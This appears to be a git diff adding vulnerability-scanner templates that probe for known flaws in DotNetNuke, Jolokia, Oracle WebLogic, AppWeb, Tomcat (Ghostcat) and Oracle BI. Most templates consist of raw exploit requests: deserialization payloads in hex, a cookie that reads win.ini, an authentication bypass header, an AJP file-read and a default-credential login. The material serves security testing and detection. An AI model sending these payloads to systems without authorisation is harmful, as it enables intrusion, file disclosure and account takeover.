diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml
new file mode 100644
index 0000000000..257292c0b8
--- /dev/null
+++ b/cves/2017/CVE-2017-9822.yaml
@@ -0,0 +1,35 @@
+id: CVE-2017-9822
+
+info:
+ name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE)
+ author: milo2012
+ severity: high
+ description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE)
+ tags: cve,cve2017,dotnetnuke,bypass
+ reference: https://github.com/murataydemir/CVE-2017-9822
+
+requests:
+ - raw:
+ - |
+ GET /__ HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
+ Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
+ Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+ Accept-Encoding: gzip, deflate
+ X-Requested-With: XMLHttpRequest
+ Connection: close
+ Cookie: dnn_IsMobile=False; DNNPersonalization=- WriteFileC:\Windows\win.ini
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '[extensions]'
+ - 'for 16-bit app support'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 404
\ No newline at end of file
diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml
new file mode 100644
index 0000000000..e00ef15315
--- /dev/null
+++ b/cves/2018/CVE-2018-1000130.yaml
@@ -0,0 +1,40 @@
+id: CVE-2018-1000130
+
+info:
+ name: Jolokia Agent Proxy JNDI Code Injection
+ author: milo2012
+ severity: high
+ description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.
+ tags: cve,cve2018,jolokia,rce
+
+requests:
+ - raw:
+ - |
+ POST /jolokia/read/getDiagnosticOptions HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
+ Accept-Language: en-GB,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 167
+
+ {
+ "type" : "read",
+ "mbean" : "java.lang:type=Memory",
+ "target" : {
+ "url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
+ }
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml
new file mode 100644
index 0000000000..0421d15888
--- /dev/null
+++ b/cves/2018/CVE-2018-2628.yaml
@@ -0,0 +1,24 @@
+id: CVE-2018-2628
+
+info:
+ name: Oracle WebLogic Server Deserialization RCE
+ author: milo2012
+ severity: high
+ reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628
+ tags: cve,cve2018,oracle,weblogic,network
+
+network:
+ - inputs:
+ - data: "{{hex_decode('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')}}"
+ read: 1024
+ - data: "{{hex_decode('000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078')}}"
+ read: 1024
+ - data: "{{hex_decode('000003ad056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')}}"
+ read: 1024
+ host:
+ - "{{Hostname}}"
+ read-size: 1024
+ matchers:
+ - type: regex
+ regex:
+ - "\\$Proxy[0-9]+"
diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml
new file mode 100644
index 0000000000..4fc9fa8c42
--- /dev/null
+++ b/cves/2018/CVE-2018-2893.yaml
@@ -0,0 +1,29 @@
+id: CVE-2018-2893
+
+info:
+ name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893)
+ author: milo2012
+ severity: high
+ tags: cve,cve2018,weblogic,network
+ reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL
+
+network:
+ - inputs:
+ - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
+ read: 1024
+ - data: "000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078"
+ type: hex
+ read: 1024
+ - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff"
+ type: hex
+ read: 1024
+ - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff"
+ type: hex
+ read: 1024
+ host:
+ - "{{Hostname}}"
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "StreamMessageImpl cannot be cast to weblogic"
diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml
new file mode 100644
index 0000000000..fb2cf93537
--- /dev/null
+++ b/cves/2018/CVE-2018-8715.yaml
@@ -0,0 +1,33 @@
+id: CVE-2018-8715
+
+info:
+ name: AppWeb Authentication Bypass vulnerability
+ author: milo2012
+ severity: high
+ description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
+ tags: cve,cve2018,appweb,auth-bypass
+ reference: |
+ - https://github.com/embedthis/appweb/issues/610
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+ Connection: close
+ Authorization: Digest username=admin
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ' '
+ part: body
diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml
new file mode 100644
index 0000000000..14c505aa53
--- /dev/null
+++ b/cves/2020/CVE-2020-1938.yaml
@@ -0,0 +1,19 @@
+id: CVE-2020-1938
+
+info:
+ name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability
+ author: milo2012
+ severity: high
+ reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
+ tags: cve,cve2020,apache,tomcat,lfi,network
+
+network:
+ - inputs:
+ - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}"
+ host:
+ - "{{Hostname}}:8009"
+ read-size: 1024
+ matchers:
+ - type: word
+ words:
+ - "See the NOTICE file distributed with"
diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml
new file mode 100644
index 0000000000..1219ef549f
--- /dev/null
+++ b/default-logins/oracle/oracle-bi-default-credentials.yaml
@@ -0,0 +1,42 @@
+id: oracle-business-intelligence-default-credentials
+
+info:
+ name: Oracle Business Intelligence Default Credentials
+ author: milo2012
+ severity: high
+ tags: oracle,dlogin
+
+requests:
+ - raw:
+ - |
+ POST /xmlpserver/services/XMLPService HTTP/1.1
+ Content-Type: text/xml
+ SOAPAction: ""
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Encoding: gzip,deflate
+ Content-Length: 771
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
+ Host: {{Hostname}}
+ Connection: Keep-alive
+
+
+
+
+
+ Administrator
+ Administrator
+ bi
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'createSessionReturn'
+ part: body
diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml
new file mode 100644
index 0000000000..cd7dd6cd13
--- /dev/null
+++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml
@@ -0,0 +1,37 @@
+id: jolokia-heap-info-disclosure
+
+info:
+ name: Jolokia Java Heap Information Disclosure
+ author: milo2012
+ severity: info
+ tags: jolokia,disclosure
+
+requests:
+ - raw:
+ - |
+ POST /jolokia/ HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
+ Accept-Language: en-GB,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 136
+
+ {
+ "type":"EXEC",
+ "mbean":"com.sun.management:type=HotSpotDiagnostic",
+ "operation":"dumpHeap",
+ "arguments":[
+ "/tmp1234/test1.hprof",
+ 0
+ ]
+ }
+
+ matchers:
+ - type: word
+ words:
+ - 'stacktrace":"java.io.IOException: No such file or directory'
+ part: body